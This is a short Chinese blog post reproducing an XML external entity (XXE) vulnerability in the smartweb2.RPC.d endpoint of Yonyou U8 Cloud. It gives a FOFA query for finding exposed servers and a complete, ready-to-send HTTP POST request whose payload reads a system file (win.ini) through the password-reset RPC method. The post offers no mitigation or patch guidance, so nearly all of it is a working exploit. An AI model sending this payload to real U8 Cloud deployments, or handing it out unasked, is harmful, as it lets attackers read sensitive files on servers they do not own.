标签:U8 漏洞 smartweb2 用友 RPC Cloud
用友U8 Cloud漏洞复现
1. Cloud smartweb2.RPC.d 存在XXE漏洞
- 漏洞描述
用友U8 Cloud smartweb2.RPC.d存在xml外部实体注入漏洞,攻击者可以通过此漏洞读取系统文件,获取敏感信息等。
- fofa语句:
app="用友-U8-Cloud"
- 漏洞:
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 258
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
标签:U8,
漏洞,
smartweb2,
用友,
RPC,
Cloud
From: https://www.cnblogs.com/lovesaber157/p/18186678